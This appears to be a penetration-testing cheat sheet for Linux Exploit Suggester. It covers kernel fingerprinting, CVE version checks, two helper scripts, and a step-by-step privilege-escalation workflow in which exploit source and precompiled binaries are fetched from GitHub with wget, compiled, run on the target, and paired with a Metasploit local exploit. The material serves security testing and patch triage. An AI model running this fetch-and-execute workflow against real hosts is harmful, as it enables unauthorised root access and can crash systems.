
Linux-Exploit-Suggester

Linux Exploit Suggester matches target system information (kernel version, distribution, architecture and optionally installed package versions) against a built-in list of known kernel and user-space privilege-escalation vulnerabilities and suggests the exploits most likely to apply.

Installation

# Download and make executable
wget https://github.com/mzet-/linux-exploit-suggester/raw/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh

# Or clone repository
git clone https://github.com/mzet-/linux-exploit-suggester.git
cd linux-exploit-suggester
chmod +x linux-exploit-suggester.sh

Basic Usage

Command                                   Description
./linux-exploit-suggester.sh              Auto-detect the running system and suggest exploits
./linux-exploit-suggester.sh -k 5.10.0    Match a given kernel version instead of the running one
./linux-exploit-suggester.sh -f           Show full details for each matched exploit (the script has no separate --list flag)
./linux-exploit-suggester.sh -h           Display help

System Information Gathering

Kernel Version Detection

# Primary kernel version check
uname -r
cat /proc/version

# Example output: 5.10.0-13-generic
# Format: MAJOR.MINOR.PATCH-BUILD-FLAVOR

Detailed System Info

# Get system info for matching
hostnamectl
cat /etc/os-release
cat /etc/lsb-release

# Kernel build info: boot parameters, architecture and the build config
# (which options are compiled in decides whether a given PoC can work at all)
cat /proc/cmdline
uname -m
cat /boot/config-$(uname -r) 2>/dev/null || zcat /proc/config.gz

Common Kernel Vulnerabilities

The grep one-liners below are quick triage only. They are anchored to the start of uname -r so that 4.10 is not mistaken for 4.1 and 5.2.6 never matches "2.6", but they cannot see backported fixes (a RHEL 3.10 kernel may be fully patched against DirtyCOW). Treat a match as "check the distro changelog", not "exploitable".

DirtyCOW (CVE-2016-5195)

# Affects: Linux 2.6.22 through 4.8.2 (fixed in 4.8.3 and backported to older stable branches)
# Impact: Local privilege escalation via a race in copy-on-write handling of private mappings
# Detection:
uname -r | grep -E "^(2\.6\.|3\.|4\.[0-8]\.)"

Overlayfs (CVE-2021-3493)

# Affects: Ubuntu kernels only (the bug is in an Ubuntu-specific patch allowing
#          unprivileged overlayfs mounts); Ubuntu 20.10 and earlier releases
#          before the April 2021 kernel updates
# Impact: Privilege escalation via file capabilities set through an overlay mount
#         inside a user namespace
# Detection: depends on the distro, not the upstream version number
grep -E "^ID=ubuntu" /etc/os-release && uname -r
cat /proc/sys/kernel/unprivileged_userns_clone   # 1 = unprivileged user namespaces allowed (the PoC needs them)

DIRTY PIPE (CVE-2022-0847)

# Affects: Linux 5.8 through 5.16.10; fixed in 5.16.11, 5.15.25 and 5.10.102
# Impact: Overwrite page-cache contents of any file the user can open for reading
#         (e.g. /etc/passwd or a setuid binary) without any root privileges
# Detection:
uname -r | grep -E "^5\.([89]|1[0-6])\."

eBPF verifier bugs (e.g. CVE-2021-3490, CVE-2022-23222)

# Affects: various 5.x kernels. CVE-2021-3490 is the ALU32 bounds-tracking bug
#          (5.7 through 5.12, shipped in Ubuntu 20.10/21.04 kernels);
#          CVE-2022-23222 is pointer arithmetic on *_OR_NULL pointer types
#          (5.8 up to the January 2022 fix)
# Impact: Kernel read/write primitive leading to privilege escalation, or a
#         panic when the PoC misfires
# Prerequisite: the public PoCs need unprivileged BPF; 0 below means it is allowed
uname -r | grep -E "^5\."
cat /proc/sys/kernel/unprivileged_bpf_disabled
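The grep checks above show the idea; what you actually want is a numeric comparison. The script below is an added example written for this page, not code from linux-exploit-suggester: it splits uname -r into numeric fields, tests a version against the introduced/fixed releases from the public advisories (treated as assumptions here), and recognises the stable-branch backports of Dirty Pipe (5.15.25, 5.10.102) and DirtyCOW (4.7.9, 4.4.26). It still cannot see distro backports, which is exactly why LES also looks at distro tags and package versions.

```sh
#!/bin/sh
# Added example for this page, not code from linux-exploit-suggester.
# Numeric matching of "uname -r" against CVE version ranges. The ranges are
# taken from the public advisories and are assumptions of this example;
# distro kernels backport fixes without bumping the version, so "yes" means
# "candidate, confirm in the package changelog", never "exploitable".

# kver_num VERSION -> MAJOR*1000000 + MINOR*1000 + PATCH as one integer,
# so 4.10 sorts after 4.8 and "5.2.6" can never match a "2.6" pattern.
kver_num() {
    v=${1%%-*}; v=${v%%+*}                 # 5.10.0-13-generic -> 5.10.0
    major=${v%%.*}
    case $v in *.*) rest=${v#*.} ;; *) rest=0 ;; esac
    minor=${rest%%.*}
    case $rest in *.*) patch=${rest#*.} ;; *) patch=0 ;; esac
    patch=${patch%%[!0-9]*}                # 0rc1 -> 0
    [ -n "$patch" ] || patch=0
    echo $(( major * 1000000 + minor * 1000 + patch ))
}

# in_range VERSION LOW HIGH -> yes when LOW <= VERSION < HIGH
# (HIGH is the first mainline release that carries the fix)
in_range() {
    n=$(kver_num "$1"); lo=$(kver_num "$2"); hi=$(kver_num "$3")
    if [ "$n" -ge "$lo" ] && [ "$n" -lt "$hi" ]; then echo yes; else echo no; fi
}

# branch_fixed VERSION FIX... -> yes when VERSION is on the same MAJOR.MINOR
# stable branch as one of the FIX releases and is at or past it
branch_fixed() {
    n=$(kver_num "$1"); shift
    for fix in "$@"; do
        f=$(kver_num "$fix")
        if [ $(( n / 1000 )) -eq $(( f / 1000 )) ] && [ "$n" -ge "$f" ]; then
            echo yes; return
        fi
    done
    echo no
}

# vulnerable VERSION INTRODUCED MAINLINE_FIX [STABLE_FIX...] -> yes/no
vulnerable() {
    ver=$1; intro=$2; mfix=$3; shift 3
    if [ "$(in_range "$ver" "$intro" "$mfix")" = yes ] && \
       [ "$(branch_fixed "$ver" "$@")" = no ]; then echo yes; else echo no; fi
}

# CVE-2016-5195 DirtyCOW: since 2.6.22, fixed in 4.8.3; 4.7 and 4.4 fixed in 4.7.9 and 4.4.26
cve_2016_5195() { vulnerable "$1" 2.6.22 4.8.3 4.7.9 4.4.26; }

# CVE-2022-0847 Dirty Pipe: since 5.8, fixed in 5.16.11; 5.15 and 5.10 fixed in 5.15.25 and 5.10.102
cve_2022_0847() { vulnerable "$1" 5.8 5.16.11 5.15.25 5.10.102; }

# report VERSION -> one line per CVE
report() {
    echo "kernel $1 -> $(kver_num "$1")"
    echo "CVE-2016-5195 DirtyCOW:   $(cve_2016_5195 "$1")"
    echo "CVE-2022-0847 Dirty Pipe: $(cve_2022_0847 "$1")"
    echo "(yes = version inside the vulnerable range; distro backports are not visible here)"
}

# Usage: sh kver-check.sh "$(uname -r)"   or any saved uname -r string
if [ $# -gt 0 ]; then report "$1"; fi
```

With this, 4.10.0 is correctly reported as not affected by DirtyCOW (the unanchored "4.[0-8]" grep would flag it) and 5.10.102 is reported as patched against Dirty Pipe even though it sits inside 5.8 to 5.16.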

Running the Tool

Basic Execution

# Automatic detection
./linux-exploit-suggester.sh

# Output format (abridged):
# Available information:
# Kernel version: 5.10.0
# Architecture: x86_64
# Distribution: debian
# ...
# Searching among:
# <N> kernel space exploits
# <N> user space exploits
# Possible Exploits:
# [+] [CVE-XXXX-XXXXX] <exploit name>
#    Details: <analysis write-up URL>
#    Exposure: highly probable / probable / less probable
#    Tags: <distro=release[{kernel:build}],...>
#    Download URL: <source or binary>

Manual Kernel Specification

# Test specific kernel version
./linux-exploit-suggester.sh -k 4.19.0

# Useful for:
# - Checking a planned patch level before rolling it out
# - Assessing a host you only have "uname -a" output from (pass the whole string with -u instead of -k)
# - Comparing several systems from one workstation

Listing the Database

# The script has no list flag: its database is embedded in the script itself,
# so grep the script for the CVE IDs it knows about
grep -oE 'CVE-[0-9]{4}-[0-9]+' linux-exploit-suggester.sh | sort -u

# For matched entries, -f / --full prints everything the database holds:
# - CVE ID and exploit name
# - Details (analysis write-up URL)
# - Exposure rating
# - Tags: distro releases and kernel builds the exploit is known to work on
# - Download URL for the source or binary
./linux-exploit-suggester.sh -f

Interpretation of Results

Exposure Levels

LES does not rate severity; it rates how likely a given entry is to apply to this system:

  • Highly probable: kernel version and distro/kernel tags match and the additional checks (kernel config, sysctl entries) pass
  • Probable: version matches but a supporting condition could not be confirmed
  • Less probable: only a loose version match; usually needs a specific build or configuration

Denial-of-service entries are hidden unless you pass -d / --show-dos.

Exploit Types

  • Kernel space: kernel bugs such as DirtyCOW or Dirty Pipe; a failed attempt can panic the machine (-k only covers these)
  • User space: setuid or helper bugs such as sudo or pkexec; matched on package versions and far safer to try first (select with --userspace-only)
  • Nearly everything in the database is local: you need a shell on the target first

Finding and Downloading Exploits

From Exploit-DB

# Once CVE is identified
searchsploit "CVE-2021-3493"
searchsploit "Overlayfs privilege escalation"

# Example result:
# Linux Kernel < 5.12.4 (OverlayFS) - Local Privilege Escalation | linux/local/49650.c

# Download
searchsploit -m 49650
gcc 49650.c -o overlayfs_exploit

From Vendor Security Updates

# Check vendor security advisories
# - https://access.redhat.com/
# - https://launchpad.net/ubuntu/
# - https://www.suse.com/security/

# They state which package version carries the fix, so you can compare it
# with the installed kernel package (dpkg -l 'linux-image-*' or rpm -q kernel)
# and catch backports that a pure uname -r match misses

Exploitation Workflow

Step 1: Gather System Info

./linux-exploit-suggester.sh > suggester_output.txt
uname -a
cat /etc/os-release

Step 2: Identify Exploitable CVEs

# Review the output for entries rated highly probable or probable
# (there is no "Danger" field; the rating line is "Exposure:")
grep -E "^\[\+\]|Exposure: (highly probable|probable)$" suggester_output.txt

Step 3: Research Exploit

# Search Exploit-DB
searchsploit "CVE-2021-3493"

# Check GitHub repositories
# - github.com/briskets/CVE-XXXX-XXXX
# - github.com/offensive-security/exploit-database

# Read PoC code and requirements

Step 4: Compile and Test

# Download exploit source
wget https://raw.githubusercontent.com/briskets/CVE-2021-3493/main/exploit.c

# Compile on a box with the same architecture; add -static if the target's
# glibc is older than the build host's, otherwise the binary fails with
# "GLIBC_x.yy not found" on the target
gcc -o exploit exploit.c

# A precompiled binary saves a compiler on the target but you cannot read what
# it does; prefer source, and if you must use a binary take it from the PoC
# author's own release and compare its hash ("user/repo" here is a placeholder)
wget https://github.com/user/repo/raw/main/exploit-x64
chmod +x exploit-x64

Step 5: Execute

./exploit
# or
./exploit-x64

# Verify privilege escalation: a successful kernel LPE drops you at uid=0
id
whoami
# sudo -l is the fallback if you are still the original user and want
# another path up
sudo -l
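Steps 1 to 3 scripted: save the LES report, keep only the entries rated probable or better, and look each one up in the offline Exploit-DB copy. This is an added example for this page, not part of linux-exploit-suggester. The report it parses is a constructed sample shaped like LES output (the CVE IDs are real; the Exposure values and Tags are made up for the example), and searchsploit's --cve flag is only called when the tool is installed.

```sh
#!/bin/sh
# Added example for this page, not code from linux-exploit-suggester.
# Turns a saved LES report into a candidate list and looks each candidate up.

# Constructed sample in the shape of LES output; not a real scan result.
sample_les_output() {
    cat <<'EOF'
Available information:

Kernel version: 5.10.0
Architecture: x86_64
Distribution: debian
Distribution version: 11

Possible Exploits:

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: highly probable
   Tags: debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: ubuntu=18|20|21,debian=10|11

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: less probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64}
EOF
}

# candidates [FILE] -> tab-separated "CVE-ID  Name  Exposure" for every entry
# rated "highly probable" or "probable"; reads stdin when FILE is omitted.
# An entry starts at a "[+] [CVE-...] Name" header; its Exposure line follows.
candidates() {
    awk '
        function flush() { if (id != "" && keep) print id "\t" name "\t" exposure }
        /^\[\+\] \[CVE-[0-9]+-[0-9]+\]/ {
            flush()
            id = $2; sub(/^\[/, "", id); sub(/\]$/, "", id)
            name = $0; sub(/^\[\+\] \[CVE-[0-9]+-[0-9]+\][ \t]*/, "", name)
            exposure = ""; keep = 0
        }
        /^[ \t]*Exposure:/ {
            exposure = $0; sub(/^[ \t]*Exposure:[ \t]*/, "", exposure)
            keep = (exposure == "highly probable" || exposure == "probable")
        }
        END { flush() }
    ' "${1:-/dev/stdin}"
}

# lookup CVE-ID -> offline Exploit-DB search when searchsploit is installed
# (its --cve flag takes the number without the "CVE-" prefix)
lookup() {
    if command -v searchsploit >/dev/null 2>&1; then
        searchsploit --cve "${1#CVE-}"
    else
        echo "searchsploit not installed; search Exploit-DB / GitHub for $1 by hand"
    fi
}

# Usage: ./linux-exploit-suggester.sh > suggester_output.txt
#        sh les-candidates.sh suggester_output.txt
if [ $# -gt 0 ]; then
    candidates "$1" | while IFS="$(printf '\t')" read -r cve name exposure; do
        echo "== $cve ($name, $exposure) =="
        lookup "$cve"
    done
fi
```

On the sample above the script keeps DirtyPipe and PwnKit and drops the "less probable" eBPF entry; PwnKit is the one to try first, because it is a user-space bug that cannot panic the box.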

Common Exploit Locations

GitHub Repositories

https://github.com/briskets/CVE-XXXX-XXXX
https://github.com/offensive-security/exploit-database
https://github.com/xcellerator/linux_kernel_cves

Exploit Databases

https://www.exploit-db.com/
https://packetstormsecurity.com/
https://securityfocus.com/ (archive only; no longer updated)

Metasploit

# Search the Metasploit database; local exploits run through an existing
# session on the target, so SESSION must be set (LHOST only matters for the payload)
msfconsole
msf > search type:exploit CVE-2021-3493
msf > use exploit/linux/local/cve_2021_3493_overlayfs
msf > set SESSION 1
msf > set LHOST <IP>
msf > run

Best Practices

  1. Always verify the CVE matches your exact kernel version and that the distro has not backported the fix (check the kernel package changelog, e.g. apt changelog linux-image-$(uname -r) or rpm -q --changelog kernel | grep CVE-)
  2. Test exploits in VM first if possible
  3. Download from trusted sources only
  4. Read exploit code before running
  5. Have backup/restore plan
  6. Document exploitation path for reporting

Exploitation Safety

# A kernel exploit that fails usually takes the whole box down (panic or hang),
# so the real safeguard is a VM snapshot or the owner's backup; as an
# unprivileged user a tarball like this misses most of /etc and other homes anyway
tar czf /tmp/system_backup.tar.gz /etc /home /var/www

# Run exploit with output redirection so the PoC's messages survive a crash
./exploit > exploit_output.txt 2>&1

# Monitor the kernel log after exploitation (read-only for root when
# kernel.dmesg_restrict=1)
dmesg | tail -20

# Check for kernel panic or issues (Debian/Ubuntu path; RHEL uses
# /var/log/messages or journalctl -k)
tail -f /var/log/kern.log

Related Tools

  • LinPEAS: Comprehensive privilege escalation scanner
  • LinEnum: Detailed Linux enumeration
  • GTFOBins: Binary exploitation database
  • pspy: Process monitoring tool
  • SearchSploit: Offline exploit search

Kernel CVE Database

The tool ships its database inside the script, split into kernel-space and user-space entries and tagged with the distro releases and kernel builds each exploit is known to work on. Roughly by era:

  • 2.6.x and 3.x: DirtyCOW (CVE-2016-5195) and the older memory-corruption exploits for these branches
  • 4.x: Overlayfs and eBPF verifier bugs
  • 5.x: Dirty Pipe (CVE-2022-0847) and newer eBPF issues
  • User space: PwnKit (CVE-2021-4034), sudo Baron Samedit (CVE-2021-3156) and similar setuid/helper bugs

Updates ship with the script itself, so re-download it before an engagement.


Last updated: March 2025